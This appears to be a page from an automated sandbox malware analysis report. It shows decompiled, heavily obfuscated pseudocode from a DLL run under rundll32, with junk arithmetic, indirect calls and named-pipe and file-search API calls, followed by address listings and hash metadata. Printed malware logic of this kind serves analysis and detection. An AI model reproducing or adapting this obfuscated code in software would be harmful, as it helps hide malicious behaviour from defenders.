				 *( *((intOrPtr*)(__rdx + 0x110)) + 0x330) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x108) * 0x1ba7;
				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x250) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x250) |  *(__rdx + 0x240) + 0x00000300;
				 *((intOrPtr*)(__rdx + 0x45c)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x20)) + 0x68)) - r13d;
				 *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x130) =  *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x130) |  *( *((intOrPtr*)(__rdx + 0x358)) + 0x4b8);
				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x4b8) =  *( *((intOrPtr*)(__rdx + 0x358)) + 0x4b8) + _t638;
				 *((long long*)( *(__rdx + 0x240) + 0x3c0)) =  *( *(__rdx + 0x240)) + 0x157a;
				_t606 =  *((intOrPtr*)(__rdx + 0x45c));
				 *((long long*)(__rdx + 0x1b8)) = _t606;
				goto 0x535f84d3;
				if ( *((intOrPtr*)(__rdx + 0x440)) - _t606 >= 0) goto 0x535f84c9;
				r13d = 0x1582;
				 *(_t724 + 0x58) = 0x651;
				if (0x651 - ( *(__rdx + 0x1a8) ^  *(__rdx + 0x478) ^  *(__rdx + 0x28)) <= 0) goto 0x535f841a;
				 *((long long*)(_t724 + 0x60)) = 0;
				_t496 = ( *(__rdx + 0x70) | _t458) *  *(__rdx + 0x58) - _t525 -  *((intOrPtr*)(__rdx + 0x110));
				 *(__rdx + 0x2a8) =  *(__rdx + 0xb0) ^ 0x000011f1;
				r14d = r14d + _t496;
				 *(__rdx + 0x448) =  *(__rdx + 0x448) + ( *(__rdx + 0x1c0) ^ 0x00001fda);
				r14d = r14d * ( *(__rdx + 0x480) ^  *(__rdx + 0x448));
				_t639 = r9d;
				r8d = r8d * ( *((intOrPtr*)(__rdx + 0x3a0)) - 0x000016ce | 0x00000bbb);
				 *(_t724 + 0x28) =  *((intOrPtr*)(__rdx + 0x138)) -  *(__rdx + 0x70) &  *(__rdx + 0x2c8);
				 *(_t724 + 0xe8) = r8d;
				r8d = r8d | r12d;
				r8d = r8d -  *(__rdx + 0x410);
				 *(_t724 + 0x20) = ( *(__rdx + 0x90) ^ _t639) *  *(__rdx + 0xd0);
				InitializeCriticalSection(_t751);
				r9d =  *(__rdx + 0x108);
				r8d =  *(__rdx + 0xb0);
				 *(_t724 + 0xe8) =  *(_t724 + 0xe8) ^ ( *(__rdx + 0x450) & r13d) + 0x00001320;
				_t459 =  *(_t724 + 0xd0);
				 *(__rdx + 0x250) =  *(__rdx + 0x250) ^ ( *(__rdx + 0x108) | _t639);
				_t526 = _t525 - (r9d | 0x00001515);
				 *((intOrPtr*)(__rdx + 0x110)) =  *((intOrPtr*)(__rdx + 0x110)) - ( *(_t724 + 0xc0) |  *(__rdx + 0x340));
				_t518 =  *(_t724 + 0xb0) - ( *(__rdx + 0x480) | r14d |  *(_t724 + 0xb0));
				 *(__rdx + 0x240) =  *(__rdx + 0x240) +  *((intOrPtr*)(__rdx + 0x300)) +  *((intOrPtr*)(__rdx + 0x418));
				 *(_t724 + 0xb0) = _t518;
				 *(_t724 + 0xc0) = _t496 ^ r14d ^ _t518;
				 *(__rdx + 0x360) =  *(__rdx + 0x360) |  *((intOrPtr*)(__rdx + 0x2f8)) -  *((intOrPtr*)(_t724 + 0x60)) - 0x00001b47;
				r8d = r8d &  *(__rdx + 0x240);
				r11d =  *(__rdx + 0x188);
				r8d = r8d | _t459;
				r11d = r11d -  *(__rdx + 0x478);
				r10d =  *(__rdx + 0x70);
				r10d = r10d *  *(_t724 + 0xb0);
				r11d = r11d * r9d;
				r9d =  *(__rdx + 0xd0);
				r9d = r9d ^  *(_t724 + 0xc0);
				 *(_t724 + 0x40) = 0x1fda;
				r9d = r9d ^ 0x00001320;
				 *((intOrPtr*)(_t724 + 0x38)) =  *((intOrPtr*)(__rdx + 0x2e0)) - r14d;
				 *(_t724 + 0x30) = r9d;
				 *(_t724 + 0x28) = r10d;
				 *(_t724 + 0x20) = r11d;
				_t451 = E00007FFA7FFA535F6E94(_t459,  *(__rdx + 0x2a8) ^ _t459 | _t518,  *((intOrPtr*)(__rdx + 0x48)) + _t526 & _t459, _t639,  *(_t724 + 0xc0),  *((intOrPtr*)(__rdx + 0x2a0)), __rdx, __rdx,  *((intOrPtr*)(__rdx + 0x138)) -  *(__rdx + 0x70) &  *(__rdx + 0x2c8));
				r9d = _t451;
				r8d =  *(_t724 + 0xe8);
				 *(_t724 + 0xb0) = _t451;
				 *(__rdx + 0x230) =  *(__rdx + 0x230) * ( *((intOrPtr*)(__rdx + 0x178)) +  *(_t724 + 0x58));
				r8d = r8d ^ r15d & _t526;
				r14d = r14d |  *((intOrPtr*)(__rdx + 0x390)) - _t459;
				if (0x655 - ( *(__rdx + 0x1a8) ^  *(__rdx + 0x478) ^  *(__rdx + 0x28)) > 0) goto 0x535f81a3;
				r14d = r14d &  *(_t724 + 0xc0);
				r14d = r14d & 0x00000bbb;
				 *((intOrPtr*)(__rdx + 0x298)) =  *((intOrPtr*)(__rdx + 0x298)) - ( *(__rdx + 0x128) & r15d) *  *(__rdx + 0x1b0);
				 *(__rdx + 0x248) =  *(__rdx + 0x248) -  *(__rdx + 0x410) *  *(_t724 + 0x58);
				ConnectNamedPipe(_t749);
				 *(__rdx + 0x4b8) =  *(__rdx + 0x4b8) | ( *(__rdx + 0x470) ^  *(__rdx + 0x140)) * 0x00001355;
				 *((intOrPtr*)(__rdx + 0x320)) =  *((intOrPtr*)(__rdx + 0x320)) + ( *(__rdx + 0xa0) & r12d);
				 *((intOrPtr*)(__rdx + 0x168)) =  *((intOrPtr*)(__rdx + 0x168)) - ((_t526 |  *(__rdx + 0x248)) &  *(__rdx + 0x70));
				goto 0x535f84d3;
				r12d = r12d | 0x00001ad7;
				return _t526 + r12d;
			}





































                0x7ffa535f7a40
                0x7ffa535f7a40
                0x7ffa535f7a40
                0x7ffa535f7a40
                0x7ffa535f7a45
                0x7ffa535f7a46
                0x7ffa535f7a4a
                0x7ffa535f7a50
                0x7ffa535f7a54
                0x7ffa535f7a5c
                0x7ffa535f7a63
                0x7ffa535f7a6b
                0x7ffa535f7a79
                0x7ffa535f7a80
                0x7ffa535f7a87
                0x7ffa535f7a8e
                0x7ffa535f7a95
                0x7ffa535f7aa0
                0x7ffa535f7aa7
                0x7ffa535f7aae
                0x7ffa535f7ab5
                0x7ffa535f7abc
                0x7ffa535f7ac2
                0x7ffa535f7ac5
                0x7ffa535f7acd
                0x7ffa535f7ada
                0x7ffa535f7aee
                0x7ffa535f7af2
                0x7ffa535f7af9
                0x7ffa535f7b05
                0x7ffa535f7b10
                0x7ffa535f7b15
                0x7ffa535f7b15
                0x7ffa535f7b1c
                0x7ffa535f7b20
                0x7ffa535f7b27
                0x7ffa535f7b2b
                0x7ffa535f7b30
                0x7ffa535f7b43
                0x7ffa535f7b4a
                0x7ffa535f7b50
                0x7ffa535f7b56
                0x7ffa535f7b56
                0x7ffa535f7b67
                0x7ffa535f7b82
                0x7ffa535f7b99
                0x7ffa535f7ba2
                0x7ffa535f7baf
                0x7ffa535f7bb5
                0x7ffa535f7bd8
                0x7ffa535f7bdf
                0x7ffa535f7be7
                0x7ffa535f7bed
                0x7ffa535f7c01
                0x7ffa535f7c08
                0x7ffa535f7c24
                0x7ffa535f7c44
                0x7ffa535f7c51
                0x7ffa535f7c5a
                0x7ffa535f7c68
                0x7ffa535f7c6e
                0x7ffa535f7c70
                0x7ffa535f7c7a
                0x7ffa535f7c7d
                0x7ffa535f7c96
                0x7ffa535f7ca4
                0x7ffa535f7cbd
                0x7ffa535f7cc4
                0x7ffa535f7cd8
                0x7ffa535f7cdf
                0x7ffa535f7cfa
                0x7ffa535f7d09
                0x7ffa535f7d10
                0x7ffa535f7d2b
                0x7ffa535f7d39
                0x7ffa535f7d40
                0x7ffa535f7d47
                0x7ffa535f7d6c
                0x7ffa535f7d79
                0x7ffa535f7d82
                0x7ffa535f7d8b
                0x7ffa535f7d94
                0x7ffa535f7d98
                0x7ffa535f7d9b
                0x7ffa535f7da4
                0x7ffa535f7daf
                0x7ffa535f7db9
                0x7ffa535f7dc4
                0x7ffa535f7dca
                0x7ffa535f7dd4
                0x7ffa535f7dd7
                0x7ffa535f7de1
                0x7ffa535f7de7
                0x7ffa535f7df1
                0x7ffa535f7dfb
                0x7ffa535f7e05
                0x7ffa535f7e0f
                0x7ffa535f7e20
                0x7ffa535f7e3f
                0x7ffa535f7e49
                0x7ffa535f7e60
                0x7ffa535f7e78
                0x7ffa535f7e85
                0x7ffa535f7e92
                0x7ffa535f7e95
                0x7ffa535f7ebc
                0x7ffa535f7ec3
                0x7ffa535f7ec9
                0x7ffa535f7ee8
                0x7ffa535f7ef5
                0x7ffa535f7efe
                0x7ffa535f7f0c
                0x7ffa535f7f12
                0x7ffa535f7f14
                0x7ffa535f7f1e
                0x7ffa535f7f21
                0x7ffa535f7f25
                0x7ffa535f7f2f
                0x7ffa535f7f36
                0x7ffa535f7f4b
                0x7ffa535f7f58
                0x7ffa535f7f60
                0x7ffa535f7f69
                0x7ffa535f7f71
                0x7ffa535f7f74
                0x7ffa535f7f9d
                0x7ffa535f7fa4
                0x7ffa535f7fab
                0x7ffa535f7fc9
                0x7ffa535f7fef
                0x7ffa535f7ffc
                0x7ffa535f8005
                0x7ffa535f800e
                0x7ffa535f8017
                0x7ffa535f801b
                0x7ffa535f801e
                0x7ffa535f8027
                0x7ffa535f8032
                0x7ffa535f803c
                0x7ffa535f8047
                0x7ffa535f8065
                0x7ffa535f8072
                0x7ffa535f808d
                0x7ffa535f80a0
                0x7ffa535f80a6
                0x7ffa535f80ad
                0x7ffa535f80b2
                0x7ffa535f80b6
                0x7ffa535f80d2
                0x7ffa535f80ed
                0x7ffa535f80fe
                0x7ffa535f8119
                0x7ffa535f8127
                0x7ffa535f813e
                0x7ffa535f8145
                0x7ffa535f814c
                0x7ffa535f8153
                0x7ffa535f816a
                0x7ffa535f8177
                0x7ffa535f818b
                0x7ffa535f8193
                0x7ffa535f819e
                0x7ffa535f81d9
                0x7ffa535f81e5
                0x7ffa535f81ec
                0x7ffa535f8203
                0x7ffa535f821d
                0x7ffa535f822c
                0x7ffa535f8242
                0x7ffa535f8257
                0x7ffa535f8264
                0x7ffa535f826c
                0x7ffa535f826f
                0x7ffa535f8276
                0x7ffa535f827b
                0x7ffa535f8296
                0x7ffa535f82a0
                0x7ffa535f82ac
                0x7ffa535f82bd
                0x7ffa535f82c4
                0x7ffa535f82d3
                0x7ffa535f82df
                0x7ffa535f82f1
                0x7ffa535f8301
                0x7ffa535f830d
                0x7ffa535f8322
                0x7ffa535f8335
                0x7ffa535f8347
                0x7ffa535f834e
                0x7ffa535f8355
                0x7ffa535f8358
                0x7ffa535f835f
                0x7ffa535f8363
                0x7ffa535f8372
                0x7ffa535f8379
                0x7ffa535f8380
                0x7ffa535f8388
                0x7ffa535f8390
                0x7ffa535f8397
                0x7ffa535f839b
                0x7ffa535f83a3
                0x7ffa535f83a8
                0x7ffa535f83ad
                0x7ffa535f83c3
                0x7ffa535f83cb
                0x7ffa535f83d7
                0x7ffa535f83de
                0x7ffa535f83ed
                0x7ffa535f83f8
                0x7ffa535f8410
                0x7ffa535f8438
                0x7ffa535f8443
                0x7ffa535f8465
                0x7ffa535f846e
                0x7ffa535f847c
                0x7ffa535f849e
                0x7ffa535f84b9
                0x7ffa535f84c0
                0x7ffa535f84c7
                0x7ffa535f84c9
                0x7ffa535f84ec

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ConnectCriticalInitializeNamedPipeSection
                • String ID:
                • API String ID: 3855124782-0
                • Opcode ID: fbf5cef5fb0f43e424f0a94a9ef42a50e7aabed04e205ea09c7ff64d780cb3fc
                • Instruction ID: 85e14e36f0efd5a3e8e60e5816fedd36d61ac4f084f8fce2450afecb0f743bfa
                • Opcode Fuzzy Hash: fbf5cef5fb0f43e424f0a94a9ef42a50e7aabed04e205ea09c7ff64d780cb3fc
                • Instruction Fuzzy Hash: 685200B2315A84ABDB5CCF29D6947A9B7A5F788B84F04512ACB6E43750CF35E1B0CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F9404 Relevance: 3.4, APIs: 2, Instructions: 378filepipeCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 67%
                			E00007FFA7FFA535F9404(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __ebp, signed long long __rbx, void* __rdx, long long __rsi, void* __r8, void* __r10) {
				signed int _t352;
				signed int _t360;
				long long _t387;
				long long _t399;
				signed long long _t411;
				long long _t419;
				long long _t437;
				signed long long _t454;
				signed long long _t456;
				void* _t459;
				intOrPtr _t489;
				long _t526;
				long long _t527;
				long long _t529;
				long long _t531;
				void* _t533;
				void* _t534;
				signed long long _t537;
				void* _t538;
				void* _t541;
				long _t542;
				long _t544;
				CHAR* _t547;
				CHAR* _t549;

				_t529 = __rsi;
				_t456 = __rbx;
				_t541 = _t533;
				 *((long long*)(_t541 + 8)) = __rbx;
				 *((long long*)(_t541 + 0x10)) = _t531;
				 *((long long*)(_t541 + 0x18)) = __rsi;
				_t534 = _t533 - 0x30;
				r14d = __rdx - 0xfb;
				r15d =  *(_t534 + 0x88);
				_t360 =  *(_t534 + 0xc8) + 0xfffffd8e;
				r10d =  *((intOrPtr*)(_t534 + 0xd0));
				r15d = r15d + 0x679;
				r9d =  *(_t534 + 0x80);
				r8d = _t459 + 0x883;
				_t527 =  *((intOrPtr*)(_t534 + 0xa8));
				r9d = r9d + 0xffffe026;
				 *(_t534 + 0xc8) = r8d;
				 *(_t534 + 0x88) = r9d;
				 *((intOrPtr*)(_t534 + 0xc0)) =  *((intOrPtr*)(_t534 + 0xa0)) + 0xffffe7e1;
				r12d = __r10 - 0x16ce;
				if (r9d - _t459 - 0x641 >= 0) goto 0x535f9a23;
				 *( *(_t527 + 0x468)) =  *( *((intOrPtr*)(_t527 + 0x5e8)) + 0x1b0) ^ 0x50747a9d;
				( *(_t527 + 0x468))[1] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x358)) + 0x1b0)) + 0x41634f98;
				 *((long long*)( *((intOrPtr*)(_t527 + 0x108)) + 0x168)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x250));
				 *((long long*)( *((intOrPtr*)(_t527 + 0x160)) + 0x250)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x160)) + 0x250)) + 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x298)) - ( *(_t527 + 0x300) | 0x000012ad);
				 *((long long*)(_t527 + 0xa8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x238)) - 0xc92;
				( *(_t527 + 0x468))[2] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x70)) + 0x65724fdd;
				 *((long long*)( *(_t527 + 0x110) + 0x28)) =  *((intOrPtr*)( *(_t527 + 0x110) + 0x398));
				 *((long long*)( *(_t527 + 0x110) + 0x398)) =  *((long long*)( *(_t527 + 0x110) + 0x398)) + 1;
				 *( *((intOrPtr*)(_t527 + 0x2a0)) + 8) =  *( *((intOrPtr*)(_t527 + 0x2a0)) + 8) |  *(_t527 + 0x4b0) | 0x000016ce;
				if (r9d - r10d > 0) goto 0x535f9c09;
				 *((long long*)(_t541 - 0x38)) = _t527;
				r8d = 0xc92;
				r9d = 0x1ba7;
				( *(_t527 + 0x468))[3] =  *( *((intOrPtr*)(_t527 + 0x160)) + 0x68) ^ 0x000066f1;
				_t387 =  *((intOrPtr*)(_t527 + 0x2a0));
				 *( *(_t527 + 0x110) + 0x248) =  *( *(_t527 + 0x110) + 0x248) ^ ( *(_t387 + 0x50) | 0x0000181f);
				E00007FFA7FFA535E10A8(0x1ec0, 0x1320, 0x1ba7, __rbx,  *(_t387 + 0x50) | 0x0000181f, __rsi, __r8, _t538, _t541);
				r13d = 0x1487;
				 *((long long*)(_t527 + 0x3e0)) = _t387;
				 *( *((intOrPtr*)(_t527 + 0x358)) + 0x158) =  *( *((intOrPtr*)(_t527 + 0x358)) + 0x158) ^  *( *(_t527 + 0x240) + 0x170) * 0x00001515;
				 *((intOrPtr*)( *(_t527 + 0x110) + 0xb0)) =  *((intOrPtr*)( *(_t527 + 0x110) + 0xb0)) + ( *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x370) ^ _t456);
				 *( *(_t527 + 0x468)) =  *((intOrPtr*)(_t527 + 0x340)) + 0x64615d5b;
				 *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x5d8) =  *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x5d8) * 0x1ec0;
				 *((long long*)( *((intOrPtr*)(_t527 + 0x5e8)) + 0x5e0)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x5e8)) + 0x5e0)) + 0xffffc972;
				( *(_t527 + 0x468))[1] =  *((intOrPtr*)(_t527 + 0x70)) + 0x726254c5;
				( *(_t527 + 0x468))[2] =  *((intOrPtr*)(_t527 + 0x340)) + 0x41796070;
				 *((long long*)( *((intOrPtr*)(_t527 + 0x5e8)) + 0x1a8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x1b0)) - _t544;
				( *(_t527 + 0x468))[3] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0x70)) - r13d;
				_t399 =  *((intOrPtr*)(_t527 + 0x20));
				 *((intOrPtr*)(_t399 + 0x398)) =  *((intOrPtr*)(_t399 + 0x398)) + _t529;
				 *((intOrPtr*)(_t527 + 0x3e0))();
				 *((long long*)(_t527 + 0x3e8)) = _t399;
				 *( *(_t527 + 0x468)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0x70)) + 0x6c645fe7;
				 *((long long*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x2f8)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x2f8)) + 0x1fef;
				( *(_t527 + 0x468))[1] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x358)) + 0x148)) + 0x6c641b17;
				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0xd0)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0xd0)) -  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x248));
				 *((long long*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x248)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x248)) + 1;
				 *( *(_t527 + 0x110) + 0x3a0) =  *( *(_t527 + 0x110) + 0x3a0) ^  *( *(_t527 + 0x110) + 0x250);
				 *( *(_t527 + 0x110) + 0x250) =  *( *(_t527 + 0x110) + 0x250) + 1;
				( *(_t527 + 0x468))[2] =  *(_t527 + 0x68) - 0x1516;
				_t411 =  *(_t527 + 0x110) + 0x3d0;
				 *( *((intOrPtr*)(_t527 + 0x160)) + 0x390) =  *( *((intOrPtr*)(_t527 + 0x160)) + 0x390) | _t411;
				 *((intOrPtr*)(_t527 + 0x3e8))();
				 *(_t527 + 0x4a8) = _t411;
				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x108)) + 0x3b8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x108)) + 0x3b8)) + ( *( *((intOrPtr*)(_t527 + 0x108)) + 0x140) | 0x00001ad7);
				 *( *(_t527 + 0x468)) =  *(_t527 + 0x68) ^ 0x704f61cc;
				( *(_t527 + 0x468))[1] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x108)) + 0x340)) + 0x69465c74;
				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x358)) + 0x90)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x358)) + 0x90)) + 0xffffecab -  *((intOrPtr*)( *(_t527 + 0x110) + 0x28));
				_t419 =  *(_t527 + 0x468);
				 *((intOrPtr*)(_t419 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x5e8)) + 0x340)) + 0x537b;
				 *((intOrPtr*)(_t527 + 0x3e0))();
				r8d = 0x11f1;
				 *((long long*)(_t527 + 0x280)) = _t419;
				 *( *(_t527 + 0x468)) =  *(_t527 + 0x2a8) ^ 0x7243555a;
				 *((long long*)( *((intOrPtr*)(_t527 + 0x20)) + 0x360)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x20)) + 0x360)) + 0xffffe13f;
				 *((long long*)( *(_t527 + 0x110) + 0x330)) =  *((intOrPtr*)( *(_t527 + 0x240) + 0x88)) - __r8;
				( *(_t527 + 0x468))[1] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x70)) + 0x65744cde;
				 *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x3a0) =  *( *((intOrPtr*)(_t527 + 0x2a0)) + 0x3a0) |  *( *((intOrPtr*)(_t527 + 0x160)) + 0x480) | _t544;
				( *(_t527 + 0x468))[2] =  *( *((intOrPtr*)(_t527 + 0x5e8)) + 0x68) ^ 0x746370d1;
				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x88)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x88)) + 0xffffe932 -  *((intOrPtr*)( *(_t527 + 0x110) + 0x370));
				_t489 =  *((intOrPtr*)(_t527 + 0x5e8));
				 *(_t527 + 0x3b8) =  *(_t527 + 0x3b8) ^  *(_t489 + 0x140);
				 *(_t489 + 0x140) =  *(_t489 + 0x140) + 1;
				( *(_t527 + 0x468))[3] =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x2a8)) + 0x6e4e55;
				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x3c8)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x160)) + 0x3c8)) +  *((intOrPtr*)(_t527 + 0x128));
				 *((long long*)(_t527 + 0x128)) =  *((long long*)(_t527 + 0x128)) - 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x320)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x2a0)) + 0x320)) +  *(_t527 + 0x68) - __r8;
				_t437 =  *((intOrPtr*)(_t527 + 0x20));
				 *(_t437 + 0x300) =  *( *((intOrPtr*)(_t527 + 0x5e8)) + 0x3c0) * 0x1ad7;
				 *((intOrPtr*)(_t527 + 0x3e0))();
				 *((long long*)(_t527 + 0x288)) = _t437;
				 *((long long*)( *((intOrPtr*)(_t527 + 0x20)) + 0x1a8)) =  *((long long*)( *((intOrPtr*)(_t527 + 0x20)) + 0x1a8)) + 0x47d;
				_t352 = ("n greasy sledge automatically indeed hut convinced ant specialist ours business overlook dungeon feral fowls spiders rate frosty covering brutally numerals waving huge wedge broadcasting fill cow faithful intelligent having laden beat cowardly episode maturity rage outcry health curiosity alternate awe revolve abode deduction contributor invitation donkey humour elinor outlet hols am edit criminal arrested lick example museum beauty walter recover cattle soap conform inhabited guarded improvement ladder tighten intrude arrow practiced declaration lustre actually stare active crackle closing " & 0x000000ff) + 0x1fda;
				 *( *(_t527 + 0x468)) =  *((intOrPtr*)( *((intOrPtr*)(_t527 + 0x20)) + 0x340)) + 0x614d625d;
				 *((long long*)( *((intOrPtr*)(_t527 + 0x108)) + 0x300)) = _t527 + 0x1d8;
				goto 0x535f9c09;
				if (_t360 - ( *(_t527 + 0x378) | r15d) < 0) goto 0x535f9a7b;
				r13d = 0x1487;
				 *((long long*)(_t527 + 0x70)) =  *((intOrPtr*)(_t527 + 0x108)) - _t352 + 0x1582;
				r8d = r8d ^ (r12d * 0x0000157a | r13d);
				 *(_t534 + 0xc8) = r8d;
				r15d = r15d *  *(_t527 + 0x1b0) * 0x10ae;
				goto 0x535f9a86;
				r12d = r12d | 0x00001ba7 * _t352 | r15d;
				if ( *((intOrPtr*)(_t527 + 0x188)) != (r14d |  *(_t527 + 0x240))) goto 0x535f9c09;
				if (_t360 -  &(_t547[_t531]) < 0) goto 0x535f9bba;
				r11d =  *(_t527 + 0x110);
				_t537 = _t352;
				 *((intOrPtr*)(_t527 + 0xd8)) =  *((intOrPtr*)(_t527 + 0xd8)) - ( *(_t527 + 0x48) | _t537 | 0x000016ce);
				r9d =  *(_t534 + 0xc8) & 0x0000ffff;
				 *(_t534 + 0x28) = (0x00001ba7 | r14d) * r9d;
				 *(_t527 + 0x88) = r9d -  *((intOrPtr*)(_t527 + 0x370)) | (r12d | _t360) ^  *(_t527 + 0x88);
				 *(_t534 + 0x20) =  *(_t527 + 0x470) * 0xc92;
				 *(_t527 + 0x3c8) =  *(_t527 + 0x3c8) * ( *(_t527 + 0x40) & 0x00001ba7);
				r8d =  *(_t527 + 0x368) & 0x0000ffff;
				 *(_t527 + 0x2e8) =  *(_t527 + 0x2e8) |  *(_t527 + 0x80) | _t537;
				r9w = r9w ^ 0x00001569;
				r8d = r8d * 0x145c;
				r8w = r8w + 0x1ba7;
				FindFirstFileA(_t549);
				CreateNamedPipeA(_t547, _t544, _t542, _t526);
				r9d =  *(_t534 + 0x88);
				_t454 = r15d;
				 *(_t527 + 0x398) =  *(_t527 + 0x398) |  *(_t527 + 0x90) & _t454 ^ 0x00001c76;
				r13d = r13d + 2;
				r14d = r14d * ( *(_t527 + 0x190) &  *(_t527 + 0x110) ^ 0x00000c92);
				 *((intOrPtr*)(_t527 + 0x2a0)) =  *((intOrPtr*)(_t527 + 0x2a0)) - _t454;
				if (r13d == (r14d |  *(_t527 + 0x240))) goto 0x535f9aa0;
				return  *((intOrPtr*)(_t534 + 0xb0)) + 0xfffff241;
			}



























                0x7ffa535f9404
                0x7ffa535f9404
                0x7ffa535f9404
                0x7ffa535f9407
                0x7ffa535f940b
                0x7ffa535f940f
                0x7ffa535f941c
                0x7ffa535f9427
                0x7ffa535f9435
                0x7ffa535f943d
                0x7ffa535f9443
                0x7ffa535f944b
                0x7ffa535f9452
                0x7ffa535f9467
                0x7ffa535f946e
                0x7ffa535f947c
                0x7ffa535f9483
                0x7ffa535f9491
                0x7ffa535f9499
                0x7ffa535f94a0
                0x7ffa535f94aa
                0x7ffa535f94ca
                0x7ffa535f94e6
                0x7ffa535f94fe
                0x7ffa535f950c
                0x7ffa535f9527
                0x7ffa535f954a
                0x7ffa535f9561
                0x7ffa535f9572
                0x7ffa535f957d
                0x7ffa535f9598
                0x7ffa535f959f
                0x7ffa535f95b6
                0x7ffa535f95ba
                0x7ffa535f95c0
                0x7ffa535f95d3
                0x7ffa535f95d6
                0x7ffa535f95ef
                0x7ffa535f95fd
                0x7ffa535f9609
                0x7ffa535f960f
                0x7ffa535f9628
                0x7ffa535f964e
                0x7ffa535f966b
                0x7ffa535f967f
                0x7ffa535f968d
                0x7ffa535f96a8
                0x7ffa535f96be
                0x7ffa535f96d9
                0x7ffa535f96f1
                0x7ffa535f96f4
                0x7ffa535f96f8
                0x7ffa535f9706
                0x7ffa535f970c
                0x7ffa535f9727
                0x7ffa535f9730
                0x7ffa535f9755
                0x7ffa535f976a
                0x7ffa535f9778
                0x7ffa535f978d
                0x7ffa535f979b
                0x7ffa535f97b2
                0x7ffa535f97c3
                0x7ffa535f97c9
                0x7ffa535f97d3
                0x7ffa535f97e0
                0x7ffa535f97f4
                0x7ffa535f980b
                0x7ffa535f9827
                0x7ffa535f9843
                0x7ffa535f985a
                0x7ffa535f9867
                0x7ffa535f9871
                0x7ffa535f987d
                0x7ffa535f9883
                0x7ffa535f9897
                0x7ffa535f989d
                0x7ffa535f98c0
                0x7ffa535f98de
                0x7ffa535f98f9
                0x7ffa535f9917
                0x7ffa535f9936
                0x7ffa535f993d
                0x7ffa535f994b
                0x7ffa535f9952
                0x7ffa535f9976
                0x7ffa535f9987
                0x7ffa535f9999
                0x7ffa535f99a3
                0x7ffa535f99bc
                0x7ffa535f99c0
                0x7ffa535f99ce
                0x7ffa535f99db
                0x7ffa535f99e6
                0x7ffa535f9a08
                0x7ffa535f9a0e
                0x7ffa535f9a17
                0x7ffa535f9a1e
                0x7ffa535f9a36
                0x7ffa535f9a3f
                0x7ffa535f9a59
                0x7ffa535f9a60
                0x7ffa535f9a6d
                0x7ffa535f9a75
                0x7ffa535f9a79
                0x7ffa535f9a83
                0x7ffa535f9a9a
                0x7ffa535f9aa6
                0x7ffa535f9ab2
                0x7ffa535f9acb
                0x7ffa535f9ae1
                0x7ffa535f9ae8
                0x7ffa535f9afa
                0x7ffa535f9b12
                0x7ffa535f9b32
                0x7ffa535f9b40
                0x7ffa535f9b51
                0x7ffa535f9b59
                0x7ffa535f9b65
                0x7ffa535f9b6e
                0x7ffa535f9b72
                0x7ffa535f9b76
                0x7ffa535f9b8a
                0x7ffa535f9b9e
